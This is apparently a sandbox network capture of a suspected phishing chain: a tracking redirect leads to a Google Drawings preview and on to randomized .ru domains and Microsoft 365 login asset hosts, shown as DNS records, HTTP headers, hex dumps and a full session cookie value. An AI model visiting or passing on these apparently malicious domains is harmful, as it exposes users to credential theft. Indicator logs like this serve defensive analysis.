                                                                                        Dec 18, 2024 02:11:03.760510921 CET1.1.1.1192.168.2.160xef39No error (0)m365cdn-sdp-public.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.862397909 CET1.1.1.1192.168.2.160x17adNo error (0)m365cdn-sdp-public.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.862397909 CET1.1.1.1192.168.2.160x17adNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:03.862397909 CET1.1.1.1192.168.2.160x17adNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:09.906189919 CET1.1.1.1192.168.2.160xfdd5No error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:10.050738096 CET1.1.1.1192.168.2.160xb3b9No error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:10.050738096 CET1.1.1.1192.168.2.160xb3b9No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:10.050738096 CET1.1.1.1192.168.2.160xb3b9No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.911060095 CET1.1.1.1192.168.2.160xfc5No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.911060095 CET1.1.1.1192.168.2.160xfc5No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.911060095 CET1.1.1.1192.168.2.160xfc5No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.911060095 CET1.1.1.1192.168.2.160xfc5No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.914407969 CET1.1.1.1192.168.2.160x48b6No error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.914407969 CET1.1.1.1192.168.2.160x48b6No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.914407969 CET1.1.1.1192.168.2.160x48b6No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:12.915333033 CET1.1.1.1192.168.2.160x4d11No error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:13.172760963 CET1.1.1.1192.168.2.160x7a79No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:13.172760963 CET1.1.1.1192.168.2.160x7a79No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:15.705558062 CET1.1.1.1192.168.2.160x3ac9No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:15.705558062 CET1.1.1.1192.168.2.160x3ac9No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:15.705558062 CET1.1.1.1192.168.2.160x3ac9No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:15.705558062 CET1.1.1.1192.168.2.160x3ac9No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:15.707613945 CET1.1.1.1192.168.2.160x7d1bNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:15.707613945 CET1.1.1.1192.168.2.160x7d1bNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:35.047113895 CET1.1.1.1192.168.2.160xa13fNo error (0)m365cdn.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 02:11:35.048002005 CET1.1.1.1192.168.2.160xf85aNo error (0)m365cdn.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                        • docs.google.com
                                                                                        • https:
                                                                                          • lh7-rt.googleusercontent.com
                                                                                          • dva.dgkifyron.ru
                                                                                          • code.jquery.com
                                                                                          • challenges.cloudflare.com
                                                                                          • gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru
                                                                                          • mem.gfx.ms
                                                                                          • js.monitor.azure.com
                                                                                        • a.nel.cloudflare.com
                                                                                        • recp.mkt81.net
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.164970115.157.143.48806728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 18, 2024 02:09:55.277776003 CET599OUTGET /ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 HTTP/1.1
                                                                                        Host: recp.mkt81.net
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Dec 18, 2024 02:09:56.451591015 CET215INHTTP/1.1 302 302
                                                                                        Date: Wed, 18 Dec 2024 01:09:56 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: keep-alive
                                                                                        Server: Apache
                                                                                        Location: //docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1
                                                                                        Dec 18, 2024 02:10:41.457370996 CET6OUTData Raw: 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.1649705172.217.19.238806728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 18, 2024 02:09:56.713025093 CET499OUTGET /drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 HTTP/1.1
                                                                                        Host: docs.google.com
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Dec 18, 2024 02:09:59.072473049 CET446INHTTP/1.1 301 Moved Permanently
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Wed, 18 Dec 2024 01:09:58 GMT
                                                                                        Location: https://docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Dec 18, 2024 02:10:44.074141026 CET6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Dec 18, 2024 02:11:29.197379112 CET6OUTData Raw: 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.164970215.157.143.48806728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 18, 2024 02:10:40.293092966 CET6OUTData Raw: 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.1649706172.217.19.238806728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 18, 2024 02:10:41.841108084 CET6OUTData Raw: 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.1649710172.217.19.2384436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:00 UTC727OUTGET /drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 HTTP/1.1
                                                                                        Host: docs.google.com
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:02 UTC3921INHTTP/1.1 200 OK
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        x-robots-tag: noindex, nofollow, nosnippet
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Wed, 18 Dec 2024 01:10:02 GMT
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-tt
                                                                                        Content-Security-Policy: base-uri 'self';object-src 'self' blob:;report-uri https://docs.google.com/drawings/cspreport;script-src 'report-sample' 'nonce-2LCgiGIj1cm837QJ9BVh_A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Origin-Trial: Arlbm3aYP4F8jryBe5TXZ49CJDmGTgEpjkLwYKtvJpvg65pxTRq/0LtrY3S/FMwogUWu6GvOhoCX1WWtJ8wVXQkAAABpeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IlVzZXJBZ2VudFJlZHVjdGlvbiIsImV4cGlyeSI6MTY1MDQxMjc5OSwiaXNTdWJkb21haW4iOnRydWV9
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Reduced
                                                                                        reporting-endpoints: default="/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/web-reports?bl=editors.drawings-frontend_20241210.02_p3&clss=1&context=eJwNzHtUzmcAB_Cn5_c8D910U61mkVlRal04tq6n3t4umGzGM8yldEdRKtsUdoRlRGzlchRdvMrbcr_NkBaa0Rxy3ylKumlq77yF2vePzz_f8_1-jTSmlgNziCGRxElIsgWKhktyxUiSNcaSaOG4iSQl5pK8HimJs7UktfCLrSQXYeJ7kuTDZ_aSlDpIMtlZEouJkri6IXeXpCBQEg2UhEpy4gtswfkrSaaAMlcSK2iYJ0kT3IuSpA0MYySxg944SWi8JNeTJHkA99dJ8gI-2SpJOAwWSjJityQjqyUZB08uSNINjnWSeELDLfxCQIMkM6CgRZJDcKxVkhqog0aYPShJLNwd1Un18L1LJ80Fm4RX1AEMnHqpIdg-7aWj4YB7Hz0ML4br6D9wxV1H_4DdHjra7Kmj7eCWpaOTYdc6Hd0Hj9br6DNIOqejqbB16Wv6Ezzx09NW0PjraTV4xempD7zO1dMh8Knvp8GQaTlA10J58QCtgkl731I_WPNwkG6AeWSIRoNm1BCthhurh-gdiPt2iCaD-3KiJKQSZQVkNBElG_oPGiiTSg0UPzDeShUreFlLlUeKojwDzXhFqYbRsxTFGS5-qShXIX69oqRAwwZFuQ_xmxQlFepbFeU25Bkx5egYppwFvx4fFgJ_dviyuxD10pclwu1XvuwhrNX5sk1QE-nHXhb4sf8g64gfy4FZ9v5sPrRM8WddQAr9mTEsGhfA4iHXO4Dlw88xAWw_VPFAdgq02wLZSei4Fsh6obkhkLXD1fAgdhvspgUxRxjQBDF6OIjN7w5iS2BOcDBbCNsrg1kh_HAkmO2AfbYqVgqDM1VMfK5iWSkqlgOtK1SsGx5lqNgz6MxTsT [TRUNCATED]
                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                        Server: ESF
                                                                                        X-XSS-Protection: 0
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Set-Cookie: NID=520=bd20F08T1lo0pJWzF4cXwN7lvaVTKd5GII5jnqWT8zGK8hczuK9dlMwXBz2ubkMzIW1ieuVMp0GD4YWcN1fiAbwdVwShhRHtZ4nvfTsVLx3wE3zVQ60wvcahxY_J6ywEi_agrvZnK-NxQNQNoVQVxGWED3MM51RA-HGGbXxKWhCJh0LKHRofNQQ; expires=Thu, 19-Jun-2025 01:10:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Accept-Ranges: none
                                                                                        Vary: Accept-Encoding
                                                                                        Connection: close
                                                                                        Transfer-Encoding: chunked
                                                                                        2024-12-18 01:10:02 UTC3921INData Raw: 34 61 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 4c 43 67 69 47 49 6a 31 63 6d 38 33 37 51 4a 39 42 56 68 5f 41 22 3e 76 61 72 20 44 4f 43 53 5f 74 69 6d 69 6e 67 3d 7b 7d 3b 20 44 4f 43 53 5f 74 69 6d 69 6e 67 5b 27 70 6c 73 27 5d 3d 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 63 65 34 67 66 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a
                                                                                        Data Ascii: 4a9a<!DOCTYPE html><html lang="en"><head><script nonce="2LCgiGIj1cm837QJ9BVh_A">var DOCS_timing={}; DOCS_timing['pls']=new Date().getTime();</script><meta property="og:title" content="ce4gf"><meta property="og:type" content="article"><meta property="og:
                                                                                        2024-12-18 01:10:02 UTC3921INData Raw: 22 2c 22 50 6c 61 79 66 61 69 72 20 44 69 73 70 6c 61 79 22 2c 22 50 54 20 53 61 6e 73 20 4e 61 72 72 6f 77 22 2c 22 4d 75 6c 69 22 2c 22 4d 6f 6e 74 73 65 72 72 61 74 22 2c 22 52 6f 62 6f 74 6f 20 53 6c 61 62 22 2c 22 52 61 6c 65 77 61 79 22 2c 22 4f 70 65 6e 20 53 61 6e 73 22 2c 22 4f 73 77 61 6c 64 22 2c 22 41 6d 61 74 69 63 20 53 43 22 2c 22 53 6f 75 72 63 65 20 53 61 6e 73 20 50 72 6f 22 2c 22 52 6f 62 6f 74 6f 22 2c 22 45 63 6f 6e 6f 6d 69 63 61 22 2c 22 52 65 65 6e 69 65 20 42 65 65 6e 69 65 22 2c 22 53 74 69 6e 74 20 55 6c 74 72 61 20 45 78 70 61 6e 64 65 64 22 2c 22 41 6c 65 67 72 65 79 61 22 2c 22 4d 65 72 72 69 77 65 61 74 68 65 72 22 5d 2c 22 64 6f 63 73 2d 6f 66 66 6c 69 6e 65 2d 74 6f 6f 6d 65 6d 22 3a 30 2c 22 6b 69 78 4f 66 66 6c 69 6e 65
                                                                                        Data Ascii: ","Playfair Display","PT Sans Narrow","Muli","Montserrat","Roboto Slab","Raleway","Open Sans","Oswald","Amatic SC","Source Sans Pro","Roboto","Economica","Reenie Beenie","Stint Ultra Expanded","Alegreya","Merriweather"],"docs-offline-toomem":0,"kixOffline
                                                                                        2024-12-18 01:10:02 UTC3921INData Raw: 2c 37 31 36 31 36 38 38 31 2c 37 31 36 33 38 35 30 33 2c 37 31 36 33 38 35 31 31 2c 37 31 36 34 32 30 34 33 2c 37 31 36 34 32 30 35 31 2c 37 31 36 35 32 38 32 30 2c 37 31 36 35 32 38 32 38 2c 37 31 36 35 37 39 38 30 2c 37 31 36 35 37 39 38 38 2c 37 31 36 35 39 38 33 33 2c 37 31 36 35 39 38 34 31 2c 37 31 36 37 39 34 36 30 2c 37 31 36 37 39 34 36 38 2c 37 31 36 38 38 39 31 38 2c 37 31 36 38 38 39 32 36 2c 37 31 36 38 39 39 34 30 2c 37 31 36 38 39 39 34 38 2c 37 31 37 32 31 30 36 37 2c 37 31 37 32 31 30 37 35 2c 37 31 37 33 33 31 30 33 2c 37 31 37 33 33 31 31 31 2c 37 31 38 32 35 34 34 33 2c 37 31 38 32 35 34 35 31 2c 37 31 38 32 35 38 36 30 2c 37 31 38 32 35 38 37 31 2c 37 31 38 33 32 39 36 36 2c 37 31 38 38 32 33 32 37 2c 37 31 38 38 32 33 33 38 2c 37 31
                                                                                        Data Ascii: ,71616881,71638503,71638511,71642043,71642051,71652820,71652828,71657980,71657988,71659833,71659841,71679460,71679468,71688918,71688926,71689940,71689948,71721067,71721075,71733103,71733111,71825443,71825451,71825860,71825871,71832966,71882327,71882338,71
                                                                                        2024-12-18 01:10:02 UTC3921INData Raw: 2c 35 37 30 35 38 39 31 2c 39 34 37 38 34 36 31 39 2c 39 35 31 33 36 30 30 31 2c 35 37 33 37 38 30 30 2c 35 37 30 37 36 39 35 2c 31 30 32 30 35 30 35 32 39 2c 35 37 35 34 38 34 38 2c 31 30 31 38 32 39 32 35 38 2c 35 37 31 37 39 31 31 2c 39 39 32 34 37 34 37 36 2c 31 30 31 36 35 39 34 33 34 2c 39 34 39 30 34 31 36 39 2c 37 31 36 37 39 34 36 30 2c 37 31 39 36 31 31 30 36 2c 37 31 31 38 35 32 39 30 2c 37 31 38 39 37 39 30 37 2c 37 31 34 35 31 32 32 32 2c 35 37 32 38 39 36 39 2c 37 31 33 38 37 33 33 35 2c 37 31 30 33 38 33 33 35 2c 37 31 31 32 30 38 36 38 2c 35 30 33 38 39 31 31 30 2c 31 30 31 36 31 37 33 37 36 2c 39 35 31 30 34 33 36 32 2c 34 39 39 37 39 35 35 38 2c 35 37 32 34 38 38 30 2c 37 31 36 38 38 39 31 38 2c 35 30 35 34 39 35 33 35 2c 39 34 36 32 34
                                                                                        Data Ascii: ,5705891,94784619,95136001,5737800,5707695,102050529,5754848,101829258,5717911,99247476,101659434,94904169,71679460,71961106,71185290,71897907,71451222,5728969,71387335,71038335,71120868,50389110,101617376,95104362,49979558,5724880,71688918,50549535,94624
                                                                                        2024-12-18 01:10:02 UTC3422INData Raw: 75 47 30 6d 45 52 71 53 47 6b 47 66 30 56 64 59 38 58 75 4c 53 22 2c 22 63 46 52 37 37 59 45 47 6f 30 69 53 46 54 43 62 69 45 42 30 50 63 4d 44 57 6a 58 32 22 2c 22 65 76 55 59 75 4e 43 53 38 30 6d 45 52 71 53 47 6b 47 66 30 50 73 69 38 6a 33 44 77 22 2c 22 73 6f 57 6e 63 52 56 37 43 30 6d 45 52 71 53 47 6b 47 66 30 50 5a 68 65 58 72 57 41 22 2c 22 54 76 6a 6f 69 43 61 61 72 30 6d 45 52 71 53 47 6b 47 66 30 53 39 71 53 35 61 64 6a 22 2c 22 74 78 4c 35 34 78 57 4c 43 30 6d 45 52 71 53 47 6b 47 66 30 58 6f 45 47 54 76 43 75 22 2c 22 66 66 5a 6d 4d 47 74 59 54 30 73 75 4b 31 4e 5a 72 32 4b 30 51 55 78 53 7a 45 4d 4e 22 2c 22 4e 61 67 62 63 5a 57 79 42 30 73 75 4b 31 4e 5a 72 32 4b 30 53 4a 6d 66 6d 4a 33 6e 22 2c 22 4b 4d 63 4c 4b 76 75 62 76 30 73 75 4b 31
                                                                                        Data Ascii: uG0mERqSGkGf0VdY8XuLS","cFR77YEGo0iSFTCbiEB0PcMDWjX2","evUYuNCS80mERqSGkGf0Psi8j3Dw","soWncRV7C0mERqSGkGf0PZheXrWA","TvjoiCaar0mERqSGkGf0S9qS5adj","txL54xWLC0mERqSGkGf0XoEGTvCu","ffZmMGtYT0suK1NZr2K0QUxSzEMN","NagbcZWyB0suK1NZr2K0SJmfmJ3n","KMcLKvubv0suK1
                                                                                        2024-12-18 01:10:02 UTC1390INData Raw: 32 30 38 34 0d 0a 6e 73 22 3a 31 2c 22 64 6f 63 73 2d 61 6d 61 77 73 6f 22 3a 30 2c 22 64 6f 63 73 2d 6f 66 6d 70 70 22 3a 31 2c 22 64 6f 63 73 2d 61 6e 6c 70 66 64 6f 22 3a 31 2c 22 64 6f 63 73 2d 65 6d 73 22 3a 22 45 4d 41 49 4c 5f 53 55 42 4d 45 4e 55 22 2c 22 64 6f 63 73 2d 67 6c 75 22 3a 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6c 6f 67 6f 75 74 3f 63 6f 6e 74 69 6e 75 65 5c 75 30 30 33 64 22 2c 22 64 6f 63 73 2d 77 73 75 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 65 73 73 65 6e 74 69 61 6c 73 2f 73 69 67 6e 75 70 2f 76 65 72 69 66 79 22 2c 22 64 6f 63 73 2d 77 73 75 70 22 3a 22 78 73 65 6c 6c 5c 75 30 30 33 64 6e 6f 72 69 5f 67 77 65 66 5f 75 70 73 65
                                                                                        Data Ascii: 2084ns":1,"docs-amawso":0,"docs-ofmpp":1,"docs-anlpfdo":1,"docs-ems":"EMAIL_SUBMENU","docs-glu":"https://accounts.google.com/logout?continue\u003d","docs-wsu":"https://workspace.google.com/essentials/signup/verify","docs-wsup":"xsell\u003dnori_gwef_upse
                                                                                        2024-12-18 01:10:02 UTC1390INData Raw: 22 64 6f 63 73 2d 65 74 70 69 22 3a 31 2c 22 64 6f 63 73 2d 65 75 73 63 61 22 3a 30 2c 22 64 6f 63 73 2d 65 77 6c 69 70 22 3a 31 2c 22 64 6f 63 73 2d 65 7a 74 63 69 22 3a 30 2c 22 64 6f 63 73 2d 65 7a 64 75 6f 6c 65 22 3a 30 2c 22 64 6f 63 73 2d 68 63 77 69 64 75 22 3a 30 2c 22 64 6f 63 73 2d 68 6d 67 22 3a 30 2c 22 64 6f 63 73 2d 69 70 6d 6d 70 22 3a 31 2c 22 64 6f 63 73 2d 69 70 75 76 22 3a 31 2c 22 64 6f 63 73 2d 6e 67 70 72 66 22 3a 30 2c 22 64 6f 63 73 2d 6f 65 73 66 22 3a 30 2c 22 64 6f 63 73 2d 6f 75 72 73 66 22 3a 30 2c 22 64 6f 63 73 2d 70 6c 69 6d 69 66 22 3a 32 30 2e 30 2c 22 64 6f 63 73 2d 73 72 6e 67 70 72 22 3a 30 2e 30 2c 22 64 6f 63 73 2d 73 72 6d 6f 65 22 3a 30 2e 30 2c 22 64 6f 63 73 2d 73 72 6d 6f 75 72 22 3a 30 2e 30 2c 22 64 6f 63 73
                                                                                        Data Ascii: "docs-etpi":1,"docs-eusca":0,"docs-ewlip":1,"docs-eztci":0,"docs-ezduole":0,"docs-hcwidu":0,"docs-hmg":0,"docs-ipmmp":1,"docs-ipuv":1,"docs-ngprf":0,"docs-oesf":0,"docs-oursf":0,"docs-plimif":20.0,"docs-srngpr":0.0,"docs-srmoe":0.0,"docs-srmour":0.0,"docs
                                                                                        2024-12-18 01:10:02 UTC1390INData Raw: 32 2c 22 64 6f 63 73 2d 73 6f 6c 22 3a 31 2c 22 64 6f 63 73 2d 64 76 73 22 3a 32 2c 22 64 6f 63 73 2d 64 61 63 22 3a 32 2c 22 64 6f 63 73 2d 69 6c 62 72 63 22 3a 30 2c 22 64 6f 63 73 2d 64 6c 70 65 22 3a 31 2c 22 64 6f 63 73 2d 65 72 61 22 3a 31 2c 22 64 6f 63 73 2d 65 72 61 75 72 6b 22 3a 31 2c 22 64 6f 63 73 2d 65 6f 62 65 77 22 3a 30 2c 22 64 6f 63 73 2d 65 72 72 65 22 3a 30 2c 22 65 6e 61 62 6c 65 5f 6f 6d 6e 69 62 6f 78 22 3a 31 2c 22 64 6f 63 73 2d 63 76 6d 6f 22 3a 2d 31 2c 22 64 6f 63 73 2d 73 65 66 22 3a 31 2c 22 64 6f 63 73 2d 73 65 6e 75 22 3a 30 2c 22 64 6f 63 73 2d 73 65 73 63 22 3a 30 2c 22 64 6f 63 73 2d 73 74 6f 67 66 63 22 3a 30 2c 22 64 6f 63 73 2d 73 73 66 6f 74 6c 22 3a 30 2c 22 64 6f 63 73 2d 73 65 61 66 22 3a 30 2c 22 64 6f 63 73 2d
                                                                                        Data Ascii: 2,"docs-sol":1,"docs-dvs":2,"docs-dac":2,"docs-ilbrc":0,"docs-dlpe":1,"docs-era":1,"docs-eraurk":1,"docs-eobew":0,"docs-erre":0,"enable_omnibox":1,"docs-cvmo":-1,"docs-sef":1,"docs-senu":0,"docs-sesc":0,"docs-stogfc":0,"docs-ssfotl":0,"docs-seaf":0,"docs-
                                                                                        2024-12-18 01:10:02 UTC1390INData Raw: 61 6f 69 75 22 3a 22 68 74 74 70 73 3a 2f 2f 61 64 64 6f 6e 73 2e 67 73 75 69 74 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6c 69 65 6e 74 22 2c 22 64 6f 63 73 2d 65 61 6f 66 75 22 3a 30 2c 22 64 6f 63 73 2d 65 67 73 61 6f 63 6f 22 3a 31 2c 22 64 6f 63 73 2d 65 67 73 61 6f 6f 73 22 3a 30 2c 22 64 6f 63 73 2d 65 67 73 61 6f 73 61 22 3a 31 2c 22 64 6f 63 73 2d 65 74 70 73 63 64 22 3a 30 2c 22 64 6f 63 73 2d 65 67 66 22 3a 30 2c 22 64 6f 63 73 2d 64 61 66 6a 65 72 61 22 3a 31 2c 22 64 6f 63 73 2d 64 61 66 6c 69 61 22 3a 31 2c 22 64 6f 63 73 2d 64 61 66 67 66 6d 61 22 3a 31 2c 22 64 6f 63 73 2d 73 70 64 79 22 3a 30 2c 22 78 64 62 63 66 41 6c 6c 6f 77 48 6f 73 74 4e 61 6d 65 50 72 65 66 69 78 22 3a 31 2c 22 78 64 62 63 66 41 6c 6c 6f 77 58 70 63 22 3a 31 2c 22
